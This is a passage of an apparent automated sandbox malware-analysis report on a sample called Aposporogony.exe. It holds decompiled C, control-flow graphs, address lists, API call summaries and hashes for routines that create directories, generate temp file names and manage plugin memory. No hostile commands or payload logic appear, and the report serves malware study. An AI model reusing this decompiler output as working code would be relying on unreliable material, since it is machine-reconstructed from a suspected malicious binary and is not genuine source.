                                                                                                                                                                                      				_v36.Dacl = 0x4083e0;
                                                                                                                                                                                      				_v16.nLength = 0xc;
                                                                                                                                                                                      				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                                                                                                                                      				if(_t22 != 0) {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					return 0;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t23 = GetLastError();
                                                                                                                                                                                      				if(_t23 == 0xb7) {
                                                                                                                                                                                      					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                                                                                                                                                      						goto L1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					return GetLastError();
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return _t23;
                                                                                                                                                                                      			}







                                                                                                                                                                                      0x0040592a
                                                                                                                                                                                      0x0040592e
                                                                                                                                                                                      0x00405931
                                                                                                                                                                                      0x00405937
                                                                                                                                                                                      0x0040593b
                                                                                                                                                                                      0x0040593f
                                                                                                                                                                                      0x00405947
                                                                                                                                                                                      0x0040594e
                                                                                                                                                                                      0x00405954
                                                                                                                                                                                      0x0040595b
                                                                                                                                                                                      0x00405962
                                                                                                                                                                                      0x0040596a
                                                                                                                                                                                      0x0040596c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040596c
                                                                                                                                                                                      0x00405976
                                                                                                                                                                                      0x0040597d
                                                                                                                                                                                      0x00405993
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405995
                                                                                                                                                                                      0x00405999

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405976
                                                                                                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405995
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                                                      • API String ID: 3449924974-3370423016
                                                                                                                                                                                      • Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                                                                                                                                      • Instruction ID: 649461beb8834c01a631d5941a9b92c7b7a92d05cb5a935181bdf460574ff338
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                                                                                                                                      • Instruction Fuzzy Hash: DF011AB1C10619DADF009FA5C944BEFBFB4EF14354F00403AE545B6291DB789608CFA9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 919 405f0d-405f19 920 405f1a-405f4e GetTickCount GetTempFileNameW 919->920 921 405f50-405f52 920->921 922 405f5d-405f5f 920->922 921->920 923 405f54 921->923 924 405f57-405f5a 922->924 923->924
                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00405F0D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                      				short _t12;
                                                                                                                                                                                      				intOrPtr _t13;
                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                      				WCHAR* _t17;
                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                      				signed short _t23;
                                                                                                                                                                                      				WCHAR* _t26;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t26 = _a4;
                                                                                                                                                                                      				_t23 = 0x64;
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					_t12 =  *L"nsa"; // 0x73006e
                                                                                                                                                                                      					_t23 = _t23 - 1;
                                                                                                                                                                                      					_v12 = _t12;
                                                                                                                                                                                      					_t13 =  *0x40a58c; // 0x61
                                                                                                                                                                                      					_v8 = _t13;
                                                                                                                                                                                      					_t14 = GetTickCount();
                                                                                                                                                                                      					_t19 = 0x1a;
                                                                                                                                                                                      					_v8 = _v8 + _t14 % _t19;
                                                                                                                                                                                      					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                                                                                                                      					if(_t17 != 0) {
                                                                                                                                                                                      						break;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_t23 != 0) {
                                                                                                                                                                                      						continue;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						 *_t26 =  *_t26 & _t23;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L4:
                                                                                                                                                                                      					return _t17;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t17 = _t26;
                                                                                                                                                                                      				goto L4;
                                                                                                                                                                                      			}












                                                                                                                                                                                      0x00405f13
                                                                                                                                                                                      0x00405f19
                                                                                                                                                                                      0x00405f1a
                                                                                                                                                                                      0x00405f1a
                                                                                                                                                                                      0x00405f1f
                                                                                                                                                                                      0x00405f20
                                                                                                                                                                                      0x00405f23
                                                                                                                                                                                      0x00405f28
                                                                                                                                                                                      0x00405f2b
                                                                                                                                                                                      0x00405f35
                                                                                                                                                                                      0x00405f42
                                                                                                                                                                                      0x00405f46
                                                                                                                                                                                      0x00405f4e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405f52
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405f54
                                                                                                                                                                                      0x00405f54
                                                                                                                                                                                      0x00405f54
                                                                                                                                                                                      0x00405f57
                                                                                                                                                                                      0x00405f5a
                                                                                                                                                                                      0x00405f5a
                                                                                                                                                                                      0x00405f5d
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Aposporogony.exe",004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77273420,004036EF), ref: 00405F46
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\Aposporogony.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                      • API String ID: 1716503409-3750269025
                                                                                                                                                                                      • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                                                                                      • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                                                                                      • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 925 73d2177b-73d217ba call 73d21b63 929 73d217c0-73d217c4 925->929 930 73d218da-73d218dc 925->930 931 73d217c6-73d217cc call 73d22356 929->931 932 73d217cd-73d217da call 73d22398 929->932 931->932 937 73d2180a-73d21811 932->937 938 73d217dc-73d217e1 932->938 939 73d21813-73d2182f call 73d2256d call 73d215b4 call 73d21272 GlobalFree 937->939 940 73d21831-73d21835 937->940 941 73d217e3-73d217e4 938->941 942 73d217fc-73d217ff 938->942 965 73d21889-73d2188d 939->965 943 73d21882-73d21888 call 73d2256d 940->943 944 73d21837-73d21880 call 73d215c6 call 73d2256d 940->944 947 73d217e6-73d217e7 941->947 948 73d217ec-73d217ed call 73d22a74 941->948 942->937 945 73d21801-73d21802 call 73d22d2f 942->945 943->965 944->965 959 73d21807 945->959 953 73d217f4-73d217fa call 73d22728 947->953 954 73d217e9-73d217ea 947->954 956 73d217f2 948->956 964 73d21809 953->964 954->937 954->948 956->959 959->964 964->937 968 73d218ca-73d218d1 965->968 969 73d2188f-73d2189d call 73d22530 965->969 968->930 972 73d218d3-73d218d4 GlobalFree 968->972 975 73d218b5-73d218bc 969->975 976 73d2189f-73d218a2 969->976 972->930 975->968 977 73d218be-73d218c9 call 73d2153d 975->977 976->975 978 73d218a4-73d218ac 976->978 977->968 978->975 979 73d218ae-73d218af FreeLibrary 978->979 979->975
                                                                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                                                                      			E73D2177B(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                                      				void _v36;
                                                                                                                                                                                      				char _v136;
                                                                                                                                                                                      				struct HINSTANCE__* _t37;
                                                                                                                                                                                      				intOrPtr _t42;
                                                                                                                                                                                      				void* _t48;
                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                      				void* _t50;
                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                      				intOrPtr _t57;
                                                                                                                                                                                      				signed int _t61;
                                                                                                                                                                                      				signed int _t63;
                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                      				void* _t72;
                                                                                                                                                                                      				void* _t76;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t76 = __esi;
                                                                                                                                                                                      				_t68 = __edi;
                                                                                                                                                                                      				_t67 = __edx;
                                                                                                                                                                                      				 *0x73d2406c = _a8;
                                                                                                                                                                                      				 *0x73d24070 = _a16;
                                                                                                                                                                                      				 *0x73d24074 = _a12;
                                                                                                                                                                                      				 *((intOrPtr*)(_a20 + 0xc))( *0x73d24048, E73D215B1);
                                                                                                                                                                                      				_push(1); // executed
                                                                                                                                                                                      				_t37 = E73D21B63(); // executed
                                                                                                                                                                                      				_t54 = _t37;
                                                                                                                                                                                      				if(_t54 == 0) {
                                                                                                                                                                                      					L28:
                                                                                                                                                                                      					return _t37;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                                                                                                                      						E73D22356(_t54);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_push(_t54);
                                                                                                                                                                                      					E73D22398(_t67);
                                                                                                                                                                                      					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                                                                                      					if(_t57 == 0xffffffff) {
                                                                                                                                                                                      						L14:
                                                                                                                                                                                      						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                                                                                                                                                      							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                                                                                                                                      								_push(_t54);
                                                                                                                                                                                      								_t37 = E73D2256D();
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_push(_t76);
                                                                                                                                                                                      								_push(_t68);
                                                                                                                                                                                      								_t61 = 8;
                                                                                                                                                                                      								_t13 = _t54 + 0x1018; // 0x1018
                                                                                                                                                                                      								memcpy( &_v36, _t13, _t61 << 2);
                                                                                                                                                                                      								_t42 = E73D215C6(_t54,  &_v136);
                                                                                                                                                                                      								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                                                                                                                                                      								_t18 = _t54 + 0x1018; // 0x1018
                                                                                                                                                                                      								_t72 = _t18;
                                                                                                                                                                                      								_push(_t54);
                                                                                                                                                                                      								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                                                                                                                                                      								 *_t72 = 4;
                                                                                                                                                                                      								E73D2256D();
                                                                                                                                                                                      								_t63 = 8;
                                                                                                                                                                                      								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_push(_t54);
                                                                                                                                                                                      							E73D2256D();
                                                                                                                                                                                      							_t37 = GlobalFree(E73D21272(E73D215B4(_t54)));
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                                                                                                                      							_t37 = E73D22530(_t54);
                                                                                                                                                                                      							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                                                                                                                                      								_t37 =  *(_t54 + 0x1008);
                                                                                                                                                                                      								if(_t37 != 0) {
                                                                                                                                                                                      									_t37 = FreeLibrary(_t37);
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                                                                                                                                                      								_t37 = E73D2153D( *0x73d24068);
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                                                                                                                                                      							goto L28;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							return GlobalFree(_t54);
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t48 =  *_t54;
                                                                                                                                                                                      					if(_t48 == 0) {
                                                                                                                                                                                      						if(_t57 != 1) {
                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						E73D22D2F(_t54);
                                                                                                                                                                                      						L12:
                                                                                                                                                                                      						_t54 = _t48;
                                                                                                                                                                                      						L13:
                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t49 = _t48 - 1;
                                                                                                                                                                                      					if(_t49 == 0) {
                                                                                                                                                                                      						L8:
                                                                                                                                                                                      						_t48 = E73D22A74(_t57, _t54); // executed
                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t50 = _t49 - 1;
                                                                                                                                                                                      					if(_t50 == 0) {
                                                                                                                                                                                      						E73D22728(_t54);
                                                                                                                                                                                      						goto L13;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_t50 != 1) {
                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}


















                                                                                                                                                                                      0x73d2177b
                                                                                                                                                                                      0x73d2177b
                                                                                                                                                                                      0x73d2177b
                                                                                                                                                                                      0x73d21788
                                                                                                                                                                                      0x73d21790
                                                                                                                                                                                      0x73d2179d
                                                                                                                                                                                      0x73d217ab
                                                                                                                                                                                      0x73d217ae
                                                                                                                                                                                      0x73d217b0
                                                                                                                                                                                      0x73d217b5
                                                                                                                                                                                      0x73d217ba
                                                                                                                                                                                      0x73d218dc
                                                                                                                                                                                      0x73d218dc
                                                                                                                                                                                      0x73d217c0
                                                                                                                                                                                      0x73d217c4
                                                                                                                                                                                      0x73d217c7
                                                                                                                                                                                      0x73d217cc
                                                                                                                                                                                      0x73d217cd
                                                                                                                                                                                      0x73d217ce
                                                                                                                                                                                      0x73d217d4
                                                                                                                                                                                      0x73d217da
                                                                                                                                                                                      0x73d2180a
                                                                                                                                                                                      0x73d21811
                                                                                                                                                                                      0x73d21835
                                                                                                                                                                                      0x73d21882
                                                                                                                                                                                      0x73d21883
                                                                                                                                                                                      0x73d21837
                                                                                                                                                                                      0x73d21837
                                                                                                                                                                                      0x73d21838
                                                                                                                                                                                      0x73d21841
                                                                                                                                                                                      0x73d21842
                                                                                                                                                                                      0x73d2184c
                                                                                                                                                                                      0x73d2184f
                                                                                                                                                                                      0x73d21854
                                                                                                                                                                                      0x73d2185b
                                                                                                                                                                                      0x73d2185b
                                                                                                                                                                                      0x73d21861
                                                                                                                                                                                      0x73d21862
                                                                                                                                                                                      0x73d21868
                                                                                                                                                                                      0x73d2186e
                                                                                                                                                                                      0x73d2187b
                                                                                                                                                                                      0x73d2187c
                                                                                                                                                                                      0x73d2187f
                                                                                                                                                                                      0x73d21813
                                                                                                                                                                                      0x73d21813
                                                                                                                                                                                      0x73d21814
                                                                                                                                                                                      0x73d21829
                                                                                                                                                                                      0x73d21829
                                                                                                                                                                                      0x73d2188d
                                                                                                                                                                                      0x73d21890
                                                                                                                                                                                      0x73d2189d
                                                                                                                                                                                      0x73d218a4
                                                                                                                                                                                      0x73d218ac
                                                                                                                                                                                      0x73d218af
                                                                                                                                                                                      0x73d218af
                                                                                                                                                                                      0x73d218ac
                                                                                                                                                                                      0x73d218bc
                                                                                                                                                                                      0x73d218c4
                                                                                                                                                                                      0x73d218c9
                                                                                                                                                                                      0x73d218bc
                                                                                                                                                                                      0x73d218d1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d218d3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d218d4
                                                                                                                                                                                      0x73d218d1
                                                                                                                                                                                      0x73d217de
                                                                                                                                                                                      0x73d217e1
                                                                                                                                                                                      0x73d217ff
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21802
                                                                                                                                                                                      0x73d21807
                                                                                                                                                                                      0x73d21807
                                                                                                                                                                                      0x73d21809
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d21809
                                                                                                                                                                                      0x73d217e3
                                                                                                                                                                                      0x73d217e4
                                                                                                                                                                                      0x73d217ec
                                                                                                                                                                                      0x73d217ed
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d217ed
                                                                                                                                                                                      0x73d217e6
                                                                                                                                                                                      0x73d217e7
                                                                                                                                                                                      0x73d217f5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d217f5
                                                                                                                                                                                      0x73d217ea
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x73d217ea

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 73D21B63: GlobalFree.KERNEL32(?), ref: 73D21DB6
                                                                                                                                                                                        • Part of subcall function 73D21B63: GlobalFree.KERNEL32(?), ref: 73D21DBB
                                                                                                                                                                                        • Part of subcall function 73D21B63: GlobalFree.KERNEL32(?), ref: 73D21DC0
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73D21829
                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 73D218AF
                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73D218D4
                                                                                                                                                                                        • Part of subcall function 73D22356: GlobalAlloc.KERNEL32(00000040,?), ref: 73D22387
                                                                                                                                                                                        • Part of subcall function 73D22728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73D217FA,00000000), ref: 73D227F8
                                                                                                                                                                                        • Part of subcall function 73D215C6: lstrcpyW.KERNEL32(?,73D24020), ref: 73D215DC
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2059161849.0000000073D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 73D20000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2059082131.0000000073D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059250947.0000000073D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059333077.0000000073D25000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_73d20000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1791698881-3916222277
                                                                                                                                                                                      • Opcode ID: 48af0836fd26391f492ac934507eaab18e282596cd2ab3fb3d9d2e9ebb05d73b
                                                                                                                                                                                      • Instruction ID: a4b7b65ba719dea5c6147351c66e3af9d82f1eabfb405ba37565c2adcee39447
                                                                                                                                                                                      • Opcode Fuzzy Hash: 48af0836fd26391f492ac934507eaab18e282596cd2ab3fb3d9d2e9ebb05d73b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B417F72400349ABDB019F649DC4B967FBCBB0472AF188565FD4BBA186DBBC81848B70
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 982 4032de-403306 GetTickCount 983 403436-40343e call 402e8e 982->983 984 40330c-403337 call 40345d SetFilePointer 982->984 989 403440-403444 983->989 990 40333c-40334e 984->990 991 403350 990->991 992 403352-403360 call 403447 990->992 991->992 995 403366-403372 992->995 996 403428-40342b 992->996 997 403378-40337e 995->997 996->989 998 403380-403386 997->998 999 4033a9-4033c5 call 406943 997->999 998->999 1001 403388-4033a8 call 402e8e 998->1001 1005 403431 999->1005 1006 4033c7-4033cf 999->1006 1001->999 1007 403433-403434 1005->1007 1008 4033d1-4033d9 call 405f90 1006->1008 1009 4033f2-4033f8 1006->1009 1007->989 1012 4033de-4033e0 1008->1012 1009->1005 1011 4033fa-4033fc 1009->1011 1011->1005 1013 4033fe-403411 1011->1013 1014 4033e2-4033ee 1012->1014 1015 40342d-40342f 1012->1015 1013->990 1016 403417-403426 SetFilePointer 1013->1016 1014->997 1017 4033f0 1014->1017 1015->1007 1016->983 1017->1013
                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                      			E004032DE(intOrPtr _a4) {
                                                                                                                                                                                      				intOrPtr _t10;
                                                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                                                      				signed int _t12;
                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                      				long _t16;
                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                      				intOrPtr _t19;
                                                                                                                                                                                      				intOrPtr _t31;
                                                                                                                                                                                      				long _t32;
                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                      				intOrPtr _t36;
                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                      				intOrPtr _t49;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t32 =  *0x418ed4; // 0x45312
                                                                                                                                                                                      				_t34 = _t32 -  *0x40ce40 + _a4;
                                                                                                                                                                                      				 *0x42a250 = GetTickCount() + 0x1f4;
                                                                                                                                                                                      				if(_t34 <= 0) {
                                                                                                                                                                                      					L22:
                                                                                                                                                                                      					E00402E8E(1);
                                                                                                                                                                                      					return 0;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				E0040345D( *0x418ee4);
                                                                                                                                                                                      				SetFilePointer( *0x40a01c,  *0x40ce40, 0, 0); // executed
                                                                                                                                                                                      				 *0x418ee0 = _t34;
                                                                                                                                                                                      				 *0x418ed0 = 0;
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					_t10 =  *0x418ed8; // 0x920e5
                                                                                                                                                                                      					_t31 = 0x4000;
                                                                                                                                                                                      					_t11 = _t10 -  *0x418ee4;
                                                                                                                                                                                      					if(_t11 <= 0x4000) {
                                                                                                                                                                                      						_t31 = _t11;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t12 = E00403447(0x414ed0, _t31);
                                                                                                                                                                                      					if(_t12 == 0) {
                                                                                                                                                                                      						break;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *0x418ee4 =  *0x418ee4 + _t31;
                                                                                                                                                                                      					 *0x40ce60 = 0x414ed0;
                                                                                                                                                                                      					 *0x40ce64 = _t31;
                                                                                                                                                                                      					L6:
                                                                                                                                                                                      					L6:
                                                                                                                                                                                      					if( *0x42a254 != 0 &&  *0x42a300 == 0) {
                                                                                                                                                                                      						_t19 =  *0x418ee0; // 0x2505
                                                                                                                                                                                      						 *0x418ed0 = _t19 -  *0x418ed4 - _a4 +  *0x40ce40;
                                                                                                                                                                                      						E00402E8E(0);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *0x40ce68 = 0x40ced0;
                                                                                                                                                                                      					 *0x40ce6c = 0x8000; // executed
                                                                                                                                                                                      					_t14 = E00406943(0x40ce48); // executed
                                                                                                                                                                                      					if(_t14 < 0) {
                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t36 =  *0x40ce68; // 0x40f3dd
                                                                                                                                                                                      					_t37 = _t36 - 0x40ced0;
                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                      						__eflags =  *0x40ce64; // 0x0
                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                      							goto L20;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t31;
                                                                                                                                                                                      						if(_t31 == 0) {
                                                                                                                                                                                      							goto L20;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						L16:
                                                                                                                                                                                      						_t16 =  *0x418ed4; // 0x45312
                                                                                                                                                                                      						if(_t16 -  *0x40ce40 + _a4 > 0) {
